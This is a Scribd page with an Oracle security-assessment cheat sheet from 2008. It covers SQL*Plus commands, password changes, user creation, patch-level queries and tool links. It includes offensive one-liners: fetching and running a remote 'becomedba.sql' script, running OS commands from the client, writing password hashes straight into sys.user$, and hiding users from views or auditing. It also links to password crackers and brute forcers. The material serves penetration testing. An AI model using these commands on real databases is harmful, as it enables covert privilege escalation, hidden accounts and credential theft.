Scribd
Upload
1K views1 page

Oracle Cheat SQLPlus Commands

The document provides information on SQL*Plus commands, different ways to change Oracle passwords, create Oracle users, get the patch level, and useful tools and links for Oracle security assessments. It lists SQL*Plus commands like connecting, running scripts, and formatting output. It also describes methods for altering passwords with SQL statements, updating password hashes directly in the data dictionary, and creating roles and users with grants. Patch levels can be obtained using opatch or querying the database. Useful tools listed crack passwords, analyze listeners, search databases, and control TNS listeners.

Uploaded by

Simo M Bentaleb
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
1K views1 page

Oracle Cheat SQLPlus Commands

The document provides information on SQL*Plus commands, different ways to change Oracle passwords, create Oracle users, get the patch level, and useful tools and links for Oracle security assessments. It lists SQL*Plus commands like connecting, running scripts, and formatting output. It also describes methods for altering passwords with SQL statements, updating password hashes directly in the data dictionary, and creating roles and users with grants. Patch levels can be obtained using opatch or querying the database. Useful tools listed crack passwords, analyze listeners, search databases, and control TNS listeners.

Uploaded by

Simo M Bentaleb
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
Download as pdf or txt
You are on page 1/ 1

SQL*Plus Commands (not always supported in other clients like TOAD, SQL*Navigator,) Connect with easy connect: sqlplus

dbsmp/dbsnmp@192.168.2.112:1521/orcl works only with Oracle 10g/11g clients SQL*Plus-Commands: @http://www.orasploit.com/becomedba.sql show parameter show parameter audit set term off set term on Set heading off Set pagesize 0 Set timing on Set autocommit on host cmd.exe /c 0wned > c:\rds8.txt set serveroutput on spool c:\myspool.txt desc utl_http desc all_users

-- execute a SQL Script from a HTTP server (FTP is also possible) -- show all parameters of the database -- show audit settings -- disable terminal output -- enable terminal output -- disable headlines -- disable pagesize -- show execution time -- commit everything after every command (!dangerous!) -- run OS commands from sqlplus (on the client), Instead of host the shortcuts ! (unix) or $ (Windows) are also possible -- enable output from dbms_output -- create a logfile of the SQL*Plus Session called myspool.txt (disable: spool off) -- show package specification of utl_http -- show view specification of all_users

Different ways to change Oracle Passwords:


With SQL*Plus Password cmd: With Alter user cmd: With Alter user cmd: With grant: With update: password system; alter user system identified by rds2008; alter user system identified by values '737B466C2DF536B9; grant connect to system identified by rds2008; update sys.user$ set password = '737B466C2DF536B9' where name=SYSTEM; create user user1 identified by rds2008; grant dba to user1; create role user1 identified by rds2008; update sys.user$ set type#=1 where name=USER1'; grant dba to user1 identified by rds2008; grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4; update sys.user$ set type#=2 where name=USER1'; opatch lsinventory; select * from dba_registry_history; -- Password not send in cleartext -- Password send in cleartext over the network -- Set a password hash directly -- Password send in cleartext over the network -- Unsupported, not auditable, flush of the dictionary cash necessary (alter system flush shared_pool;) -- Password send in cleartext over the network -- Create a role and change the type. Not audited -- Privilege granted, User will be created if not existing -- Password send in cleartext over the network -- Hide an user in the views dba_user/all_users, no view modification ncessary -- Get the patchlevel via opatch (on DB server, OS level) -- Get last CPU applied

Create Oracle User:


With create user cmd: With create role cmd: With grant: With grant: Invisible User:

Get Patch Level:


Get Patchlevel via opatch: Get Patchlevel via SQL:

Useful Tools / Links:


checkpwd: woraauthbf anapassword.sql dbgrep.sql analistener.sql tnscmd sidguess: Oracle Assessment Kit: Oracle Instant Client Oracle SQL Developer Backtrack 2 http://www.red-database-security.com/software/checkpwd.html http://soonerorlater.hu/download/woraauthbf_0.2.zip http://www.red-database-security.com/scripts/anapassword.sql http://www.red-database-security.com/scripts/dbgrep.sql http://www.red-database-security.com/scripts/analistener.sql http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd http://www.red-database-security.com/software/sidguess.zip http://www.databasesecurity.com/dbsec/OAK.zip http://www.oracle.com/technology/software/tech/oci/instantclient/index.html http://www.oracle.com/technology/software/products/sql/index.html http://www.remote-exploit.org Hacking Oracle www.red-database-security.com -- fastest multiplatform Oracle dictionary password cracker -- fastest Oracle Brute Force cracker -- get a list of application password + type -- search for a specific string in the database -- analyse Oracle listener log -- control unprotected TNS Listener without Oracle Client -- fastest Oracle dictionary password cracker -- useful tools, e.g. to exploit the alter session bug -- Oracle Instant Client -- GUI Tool for Oracle in Java -- Linux Live CD with many Oracle Security Tools Version 1.5.0 - 29-Jan-2008

You might also like